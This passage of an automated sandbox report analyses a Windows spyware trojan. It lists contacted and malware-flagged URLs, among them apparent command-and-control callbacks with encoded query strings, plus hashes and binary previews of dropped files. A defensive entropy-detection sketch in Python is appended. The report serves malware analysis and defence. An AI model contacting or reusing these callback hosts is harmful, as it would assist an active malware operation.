                                          http://www.thedivinerudraksha.comexplorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.white-hat.uk/u2kb/www.white-hat.ukexplorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://www.energyservicestation.com/u2kb/www.energyservicestation.comexplorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://white-hat.uk/u2kb/?X51Qjm=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0Iyexplorer.exe, 00000004.00000002.583702124.0000000015526000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.0000000004F76000.00000004.10000000.00040000.00000000.sdmptrue
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://www.white-hat.ukexplorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.employerseervices.com/u2kb/www.employerseervices.comexplorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.dzyngiri.comexplorer.exe, 00000004.00000002.583702124.0000000016024000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.0000000005A74000.00000004.10000000.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.mygloballojistik.online/u2kb/explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.avisrezervee.comexplorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.bitservicesltd.comexplorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://justinmezzell.comexplorer.exe, 00000004.00000002.583702124.0000000016024000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.0000000005A74000.00000004.10000000.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.white-hat.uk/u2kb/explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://alldomains.hosting/domain-registrieren.htmlexplorer.exe, 00000004.00000002.583702124.0000000015B6E000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.00000000055BE000.00000004.10000000.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.gritslab.comexplorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.thewildphotographer.co.ukexplorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.fclaimrewardccpointq.shop/u2kb/www.fclaimrewardccpointq.shopexplorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://www.222ambking.org/u2kb/www.222ambking.orgexplorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://www.fclaimrewardccpointq.shop/u2kb/explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000004.00000003.561968971.000000000ED28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.566841892.0000000000921000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.344218674.000000000ED28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.580393358.000000000ED28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.320444720.000000000091F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://www.energyservicestation.comexplorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icocmstp.exe, 00000006.00000003.402261377.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.6.drfalse
                                              high
                                              http://www.employerseervices.com/u2kb/explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.younrock.comexplorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=HI4NJ046K.6.drfalse
                                                high
                                                https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchcmstp.exe, 00000006.00000003.402261377.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.6.drfalse
                                                  high
                                                  http://nsis.sf.net/NSIS_ErrorErroru8QPnVhq0N.exefalse
                                                    high
                                                    http://www.un-object.com/u2kb/www.un-object.comexplorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://www.avisrezervee.com/u2kb/explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://www.mygloballojistik.online/u2kb/www.mygloballojistik.onlineexplorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=cmstp.exe, 00000006.00000003.402261377.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.6.drfalse
                                                      high
                                                      http://www.thedivinerudraksha.com/u2kb/www.thedivinerudraksha.comexplorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://alldomains.hosting/explorer.exe, 00000004.00000002.583702124.0000000015B6E000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.00000000055BE000.00000004.10000000.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.fclaimrewardccpointq.shopexplorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://www.sedo.com/services/parking.php3cmstp.exe, 00000006.00000002.570208700.0000000007150000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://ac.ecosia.org/autocomplete?q=HI4NJ046K.6.drfalse
                                                          high
                                                          https://search.yahoo.com?fr=crmas_sfpcmstp.exe, 00000006.00000003.402261377.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.6.drfalse
                                                            high
                                                            http://www.ecomofietsen.com/u2kb/explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://alldomains.hosting/hosting-webhosting.htmlexplorer.exe, 00000004.00000002.583702124.0000000015B6E000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.00000000055BE000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.germanreps.com/u2kb/www.germanreps.comexplorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            http://www.germanreps.com/u2kb/explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            http://www.employerseervices.comexplorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.younrock.com/u2kb/www.younrock.comexplorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            http://www.222ambking.orgexplorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.shapshit.xyz/u2kb/www.shapshit.xyzexplorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            http://thedivinerudraksha.com/u2kb/?X51Qjm=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pRexplorer.exe, 00000004.00000002.583702124.00000000161B6000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.0000000005C06000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            http://www.ecomofietsen.com/u2kb/www.ecomofietsen.comexplorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            http://www.un-object.comexplorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=HI4NJ046K.6.drfalse
                                                              high
                                                              http://www.bitservicesltd.com/u2kb/www.bitservicesltd.comexplorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
Joe Sandbox Version: 37.0.0 Beryl
Analysis ID: 830804
Start date and time: 2023-03-20 17:49:26 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 12s
Hypervisor based Inspection enabled: false
Report type: light
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: u8QPnVhq0N.exe
Original Sample Name: 7de990046a20e6666627273589b014a5.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@10/5@12/10
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 75.9% (good quality ratio 69.9%)
• Quality average: 76%
• Quality standard deviation: 30.2%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                                                              • TCP Packets have been reduced to 100
                                                              • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                               • Not all processes were analyzed, report is missing behavior information
                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                               Time | Type | Description
                                                               17:51:00 | API Interceptor | 659x Sleep call for process: explorer.exe modified
                                                              Process:C:\Windows\SysWOW64\cmstp.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):94208
                                                              Entropy (8bit):1.287139506398081
                                                              Encrypted:false
                                                              SSDEEP:192:Qo1/8dpUXbSzTPJPF6n/YVuzdqfEwn7PrH944:QS/indc/YVuzdqfEwn7b944
                                                              MD5:292F98D765C8712910776C89ADDE2311
                                                              SHA1:E9F4CCB4577B3E6857C6116C9CBA0F3EC63878C5
                                                              SHA-256:9C63F8321526F04D4CD0CFE11EA32576D1502272FE8333536B9DEE2C3B49825E
                                                              SHA-512:205764B34543D8B53118B3AEA88C550B2273E6EBC880AAD5A106F8DB11D520EB8FD6EFD3DB3B87A4500D287187832FCF18F60556072DD7F5CC947BB7A4E3C3C1
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Users\user\Desktop\u8QPnVhq0N.exe
                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):95232
                                                              Entropy (8bit):6.231519588351459
                                                              Encrypted:false
                                                              SSDEEP:1536:opZrDPCXLdr7zQN/GZGLaYeZjtBaKaedCRVLR8dpxekydJrD9iiU71aC4sWBlVmc:oHTCB7Y/GZGPeZxaGCRVLR9kydI7sCU5
                                                              MD5:6CB712E482D150A185F713D75314A75A
                                                              SHA1:0EE7D4AB0D46C6A668AA500470AAFB632F1ACD99
                                                              SHA-256:C5E0F86A68DCBD03B9A506768F86C385C360D3CF67B9CC0B5760F7B3F1D91F48
                                                              SHA-512:042C3B3A24C35686FA11FBF052A8F278C12535B5F90ECDE5319AA86B8F3616A9A00FBE5E86BD644E2101201B994648BCE2B1F6D6E1F4EDA6C8140F93421CD6E1
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 33%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......{.8-?.V~?.V~?.V~t.U.5.V~t.S...V~t.R.+.V~..S...V~..R...V~..U.,.V~t.W.(.V~?.W~@.V~..^.>.V~..T.>.V~Rich?.V~........................PE..L...2'.d...............!.....z....................@.........................................................................<k.......................................^...............................]..@............................................text............................... ..`.rdata...e.......f..................@..@.data...l............j..............@...........................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Users\user\Desktop\u8QPnVhq0N.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):329165
                                                              Entropy (8bit):7.541945169368556
                                                              Encrypted:false
                                                              SSDEEP:6144:WVez7cuIYLUvLfkWAdTEkQUOM1sXFQveBUQZKQldIDMzCu/GZVZxML7L2+P:WKcsCftAdTEarq3BUQZKQfuMzCu/QZOS
                                                              MD5:4ED3CB08EC2E744A786A87B5FEA1AA59
                                                              SHA1:76A5A491D05D504A367C19F0E9669BAA474A8D12
                                                              SHA-256:A3710AFDDF05886219EB7EBA3A85F0AD33EAC1BA6C4BB67F7B389C6CDA15875D
                                                              SHA-512:EEA49222FD83CA261685EB282985906AF43B0020960961CA8141446E432D594BEC294EC2A76747D6B9F834ABCD3218CA5A014A769DBB7F3B8959360E8FD5ECDC
                                                              Malicious:false
                                                              Preview:.A......,........................-.......@.......A..............................................................................H...........................................................................................................................................................G...................j...............................................................................................................................I...........l...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Users\user\Desktop\u8QPnVhq0N.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):211209
                                                              Entropy (8bit):7.998782052319318
                                                              Encrypted:true
                                                              SSDEEP:6144:7Vez7cuIYLUvLfkWAdTEkQUOM1sXFQveBUQZKQlu:7KcsCftAdTEarq3BUQZKQI
                                                              MD5:0A629526F8AEC96658786151E6C3EA06
                                                              SHA1:80B71B17469506F4023F5E3C35715A6A130AC4C5
                                                              SHA-256:D61BEA82FCBA68CFBC5E6BBE882D5E373EAA26C0DD4AD9C5626EE13A780AB546
                                                              SHA-512:848E3A46F2EAEF9656ADF2DAFE618C20BDDB19D98836F43065F219A58D14BEBB554A63B7844560CCF0EF2124F6D51AD2A6D71DA8AA0408EF639D6BB4FFF0A2F4
                                                              Malicious:false
                                                              Preview:...^.1s..E...g..0#YI.!.Dg.,$.K.......#>......i..^...&..X..|..,...\1....e.o.5.T`....;...>.Y..m.c.. ..X.}..mV_.6B]D...UQ.H.C......x..?y..`...`...*.8......K.z.x.o.;.}Z~]v.TO..........V.{...-.>i]..4-e......[m^Bx.N..T!.[.E..yVD.q......"$m..0g.y.^\.B-.U.`.1s...QH.....4.Y....;...-........@.#>....u.i..^.z.&..X.5|......\.,.,Mrc?4....w+..'~&lO..5C.Y.*...I...'.5.}a..8/~.UQ.H.C...U<..*m$.xT..eQ...H...^......j.w[m.H7..B..V.m......qW.:..{.8....(.}v........[.^~..,^..u.0.E..yVD......."....0....^\.B-.U.`.1s..QH......MY....;.....K.......#>......i..^...&..X.5|......\.,.,Mrc?4....w+..'~&lO..5C.Y.*...I...'.5.}a..8/~.UQ.H.C...U<..*m$.xT..eQ...H...^......j.w[m.H7..B..V.m..........V.{.d.-..(.}{6.......[.^~..,^.Tu.[.E..yVD......."....0....^\.B-.U.`.1s..QH......MY....;.....K.......#>......i..^...&..X.5|......\.,.,Mrc?4....w+..'~&lO..5C.Y.*...I...'.5.}a..8/~.UQ.H.C...U<..*m$.xT..eQ...H...^......j.w[m.H7..B..V.m..........V.{.d.-..(.}{6.......[.^~..,^.Tu.[.E..yVD.
                                                              Process:C:\Users\user\Desktop\u8QPnVhq0N.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):5854
                                                              Entropy (8bit):7.162377453768944
                                                              Encrypted:false
                                                              SSDEEP:96:Farc6oY3g/DrYujk2XO5oSwYgCP7Yc3NdN6d35O4pTU15Fn9O2PGiMCmbvrfjXC:FarcRXrhX1S9PPN6d3ZpTU15EJLrLXC
                                                              MD5:452A3EE71E9BA72BB78302A46C6D5B12
                                                              SHA1:F86411F3F43C4351EF651B38A1402C63B90DB7AC
                                                              SHA-256:521E94034E7166D401C6831BFEE91A92848BF821EAE75ADBD857F503C3D42BC2
                                                              SHA-512:0BB5A96F91E37AB5B89A02C2B25D449C27D1A1E25EB42D461D4B52AE2FB067FDF288EF7F7A4C43955BD7A3A1B32CC514F1C4DD27DBFBB6FE6C7916763056DFD3
                                                              Malicious:false
                                                              Preview:.005m..f.F<...05o.:......?v>.3.3.<......M.knl.02a..c.E<...42c. ......4.D63.6.3.?.....E.gni.53P..805.p8.q?.2.8.u .a..beabo.H0..v..v.@3.`..i/7.p.6.t(2..g.}.u<..G-.0.3.h.f....w8L$.m.r.D;F...okc..m.;4.q.?.<@.4.0...m..u<f...@%.`4..D'd.O$..A5..=..<r..4M.knl.82a..Q..401ec.t4.M4...D;.D..d580..E9....E....3.u.mje.18e..`W..480.x<.p=.4.4.p-P..6.c.!....D%.|.eX.....+..t..0....e.a..`beP..580.p=.t>.8.5.p,XE..Md.....M9..e...@4......F1..u.|c.....Lq.}<...v<+480.}<;.&<.>..r.^.q8F0....q.^.q8F0...^..M...3uc.....}<F...kloe.=8e...548.r...t..w.(058.q..v..I.0A..q..34.q.p.}..u.{.w....}.p013......u.L.4F".u..04.t.t.q..p.x.u....q.8580..Y...}..E.4D'.q..80.}.t.t..w.p.p...X+AK..M......v.ZXK.J.E.....}.]..O.F.....u.X_.M.M......H...X...K.D.....}.\&....A..B....G...P5..O.E..P....\...Y...K.E..a....B...].4.T.4.q0.p..q..~<1|..x.q.>.t&.u.|1,.t..w.pe..\...w.p..u.T.4.Q.0.}.;.q%..5M%.}.;.qm..tL9.}.5013.6.].5.u...K...P3480..u...dR0.m...D4...B358.q.0342.}.e......dX4R0]<048[3^2^8Z5..p...d.a..
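The "Entropy (8bit)" and "Encrypted" fields on the dropped files above come from a byte-frequency measurement: the 211209-byte file scores 7.9988 and is flagged encrypted, the 329165-byte file scores 7.54 and is not. The Python below is an added example, not Joe Sandbox's code, showing how that score is computed and how a sliding window turns the same measurement into a locator for the packed payload inside a container such as the NSIS installer analysed here. The 7.9 whole-file cut-off and the 7.0 per-window cut-off are assumptions chosen to reproduce the report's two verdicts; the sample bytes are constructed.

```python
import math


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for one repeated value, 8.0 for a uniform byte distribution."""
    n = len(data)
    if n == 0:
        return 0.0
    h = 0.0
    for value in set(data):
        p = data.count(value) / n
        h -= p * math.log2(p)
    return h


def looks_encrypted(data: bytes, threshold: float = 7.9) -> bool:
    """Whole-file verdict. The 7.9 cut-off is an assumption that reproduces the report's
    verdicts (7.54 -> false, 7.9988 -> true); the sandbox's own threshold is not given."""
    return shannon_entropy(data) >= threshold


def windowed_entropy(data: bytes, window: int = 512):
    """Entropy of consecutive non-overlapping windows as (offset, entropy) pairs."""
    return [(off, shannon_entropy(data[off:off + window]))
            for off in range(0, len(data), window)]


def high_entropy_regions(data: bytes, window: int = 512, threshold: float = 7.0):
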